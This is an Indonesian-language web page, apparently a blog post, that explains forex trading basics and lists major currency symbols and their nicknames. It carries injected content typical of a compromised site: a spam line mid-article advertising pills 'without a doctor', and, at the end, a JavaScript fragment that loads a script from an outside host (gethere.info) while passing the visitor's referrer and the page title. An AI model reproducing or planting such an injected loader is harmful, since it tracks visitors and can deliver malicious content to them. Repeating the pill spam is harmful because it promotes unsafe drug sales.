Comment are off

Apa yang diperdagangkan ?

Jawaban yang sederhana adalah UANG.

Simbol mata uang selalu memiliki tiga huruf. Dua huruf pertama mengidentifikasi nama negara dan satu huruf terakhir mengidentifikasi nama mata uang negara tersebut.

Karena Anda tidak membeli apa-apa fisik, perdagangan semacam ini dapat membingungkan bagi yang tidak memiliki pengetahuan.

Harga mata uang adalah refleksi langsung dari pasar, tentang kondisi perekoniomian suatu negara saat ini dan akan datang.

Ketika Anda membeli, katakanlah, Eur/Usd (Euro vs Dollar), Anda membeli (Buy) pada mata uang Eur. dengan harapan perekonomian negara2 euro berjalan dengan baik, Jika perekonomian negara tersebut membaik maka anda akan mendapatkan keuntungan (profit ), jika di visualisasikan ke dalam grafik ketika perekonomian eur menguat terhadapn usd maka pergerakan grafik/chart akan bergerak ke naik atas, begitupun sebaliknya, jika eur melemah terhadap usd maka pergerakan grafik/chart akan kebawah.

Secara umum, nilai tukar mata uang terhadap mata uang lainnya adalah refleksi dari kondisi ekonomi negara itu, dibandingkan dengan ekonomi negara lain.

Mata Uang Mayor Yang Diperdagangkan Antara lain :

purchase cheat generic pills without a doctor – http://fidia-2010.mhs.narotama.ac.id/2016/11/30/purchase-cheat-generic-pills-without-a-doctor/

cheap pills

Simbol Negara Mata Uang Sebutan
USD United States Dollar Buck
EUR Euro Members Euro Fiber
JPY Japan Yen Yen
GBP Great Britain Pound Cable
CHF Switzerland Franc Swissy
CAD Canada Dollar Loonie
AUD Australia Dollar Aussie
NZD New Zealand Dollar Kiwi

Simbol mata uang selalu memiliki tiga huruf, dimana dua huruf pertama mengidentifikasi nama negara dan Satu huruf terakhir mengidentifikasi nama mata uang negara tersebut.

Misalnya CAD singkatan dari Canada, sementara D adalah singkatan dari dollar. Cukup mudah, bukan ?

Mata uang yang tercantum dalam tabel diatas adalah Mata uang yang paling sering dan yang paling banyak diperdagangkan.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About the Author